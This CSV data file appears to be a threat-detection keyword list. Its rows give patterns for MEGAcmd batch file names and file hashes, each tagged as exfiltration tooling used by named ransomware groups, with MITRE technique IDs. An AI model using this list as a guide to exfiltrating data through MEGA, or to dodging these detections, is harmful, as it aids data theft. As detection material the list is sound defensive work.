"*\mega-get.bat*",".{0,1000}\\mega\-get\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-graphics.bat*",".{0,1000}\\mega\-graphics\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-help.bat*",".{0,1000}\\mega\-help\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-https.bat*",".{0,1000}\\mega\-https\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-import.bat*",".{0,1000}\\mega\-import\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-invite.bat*",".{0,1000}\\mega\-invite\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-ipc.bat*",".{0,1000}\\mega\-ipc\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-killsession.bat*",".{0,1000}\\mega\-killsession\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-lcd.bat*",".{0,1000}\\mega\-lcd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-log.bat*",".{0,1000}\\mega\-log\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-login.bat*",".{0,1000}\\mega\-login\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-logout.bat*",".{0,1000}\\mega\-logout\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-lpwd.bat*",".{0,1000}\\mega\-lpwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-lpwd.bat*",".{0,1000}\\mega\-lpwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-ls.bat*",".{0,1000}\\mega\-ls\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-mediainfo.bat*",".{0,1000}\\mega\-mediainfo\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-mkdir.bat*",".{0,1000}\\mega\-mkdir\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-mount.bat*",".{0,1000}\\mega\-mount\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-mv.bat*",".{0,1000}\\mega\-mv\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-passwd.bat*",".{0,1000}\\mega\-passwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-preview.bat*",".{0,1000}\\mega\-preview\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-proxy.bat*",".{0,1000}\\mega\-proxy\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-put.bat*",".{0,1000}\\mega\-put\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-pwd.bat*",".{0,1000}\\mega\-pwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-pwd.bat*",".{0,1000}\\mega\-pwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-quit.bat*",".{0,1000}\\mega\-quit\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-reload.bat*",".{0,1000}\\mega\-reload\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-rm.bat*",".{0,1000}\\mega\-rm\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-session.bat*",".{0,1000}\\mega\-session\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-share.bat*",".{0,1000}\\mega\-share\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-showpcr.bat*",".{0,1000}\\mega\-showpcr\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-signup.bat*",".{0,1000}\\mega\-signup\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-speedlimit.bat*",".{0,1000}\\mega\-speedlimit\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-sync.bat*",".{0,1000}\\mega\-sync\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-thumbnail.bat*",".{0,1000}\\mega\-thumbnail\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-transfers.bat*",".{0,1000}\\mega\-transfers\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-tree.bat*",".{0,1000}\\mega\-tree\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-userattr.bat*",".{0,1000}\\mega\-userattr\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-users.bat*",".{0,1000}\\mega\-users\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-version.bat*",".{0,1000}\\mega\-version\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-webdav.bat*",".{0,1000}\\mega\-webdav\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-whoami.bat*",".{0,1000}\\mega\-whoami\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\Update MEGAcmd.lnk*",".{0,1000}\\Update\sMEGAcmd\.lnk.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*>MEGAcmd<*",".{0,1000}\>MEGAcmd\<.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#productname","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*0302bf02c300acfcfcacc660b0bc9fb2077c1fdddc70d07196c72ffce08fe57a*",".{0,1000}0302bf02c300acfcfcacc660b0bc9fb2077c1fdddc70d07196c72ffce08fe57a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*03d39664173b9baf2ae530b457510c4ee915e9060be46063511ed903d3afa265*",".{0,1000}03d39664173b9baf2ae530b457510c4ee915e9060be46063511ed903d3afa265.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*04fe985dcc18c3ab8dc4ecf5ebf61ed9dd4bafdcd0937c8d10235c98b2f4a9ae*",".{0,1000}04fe985dcc18c3ab8dc4ecf5ebf61ed9dd4bafdcd0937c8d10235c98b2f4a9ae.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*05a360775b320890751946115dc6802fb3281817088c98696df97015abb5207a*",".{0,1000}05a360775b320890751946115dc6802fb3281817088c98696df97015abb5207a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*071c731ba00d290f45bb8c1b53bb18f27ea8ac9780e9fa30e66cb071ae743778*",".{0,1000}071c731ba00d290f45bb8c1b53bb18f27ea8ac9780e9fa30e66cb071ae743778.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*074be5bde2acec1ea578d7c8e56463ff115851c9af70caeef002ae13c2cee1a3*",".{0,1000}074be5bde2acec1ea578d7c8e56463ff115851c9af70caeef002ae13c2cee1a3.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*07f035eece5daa843a0b570b66d714e35f886e21a05446454743ed6e4729fc16*",".{0,1000}07f035eece5daa843a0b570b66d714e35f886e21a05446454743ed6e4729fc16.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*0809a44b710a9ff83ae4ab0358fa49881955184ca2d8823b2a1713d2a5d3f741*",".{0,1000}0809a44b710a9ff83ae4ab0358fa49881955184ca2d8823b2a1713d2a5d3f741.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
